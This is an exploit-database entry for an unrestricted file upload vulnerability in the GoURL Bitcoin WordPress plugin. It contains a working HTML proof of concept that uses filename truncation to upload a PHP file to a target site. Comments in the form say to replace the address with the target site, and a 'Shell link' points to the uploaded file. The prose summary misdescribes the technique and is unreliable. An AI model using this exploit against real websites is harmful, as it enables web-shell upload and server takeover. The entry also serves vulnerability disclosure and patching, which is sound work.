GoURL Unrestricted Upload Vulnerability POC

vendor:

GoURL Bitcoin Wordpress Plugin

by:

pouyadarabi

7.5

CVSS

HIGH

Unrestricted Upload

434

CWE

Product Name: GoURL Bitcoin Wordpress Plugin

Affected Version From: GoURL Bitcoin Wordpress Plugin prior to version 8aa17068d7ba31a05f66e0ab2bbb55efb0f60017

Affected Version To: GoURL Bitcoin Wordpress Plugin prior to version 8aa17068d7ba31a05f66e0ab2bbb55efb0f60017

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

GoURL Unrestricted Upload Vulnerability POC

GoURL Unrestricted Upload Vulnerability POC is a vulnerability in the GoURL Bitcoin Wordpress Plugin. The vulnerable function is located at https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637. The vulnerability is caused by the use of a substring for the file name to select the first 95 letters, allowing an attacker to upload a file with a .php extension. To exploit this vulnerability, an attacker must create a file with a name of 95 characters or less, followed by a .php extension, and upload it to the target WordPress website. The uploaded file can then be accessed via a link such as http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.

Mitigation:

To mitigate this vulnerability, the GoURL Bitcoin Wordpress Plugin should be updated to a version that does not use a substring for the file name to select the first 95 letters.

Source

Exploit-DB raw data:

<html>
    <!--

        GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi      
        CWE-434

        Vulnerable Fucntion: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
        
        Details:
        
          After checking file extention substring was used for file name to select first 95 letter line #5655
          So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
          will upload a file with .php extention in website :)

    -->

<body>

    <!--

        Replace http://127.0.0.1/wp/ with target wordpress website
        Fill id param in form action to any active download product

    -->

    <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>
        
    </form>

    <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>

</body>

</html>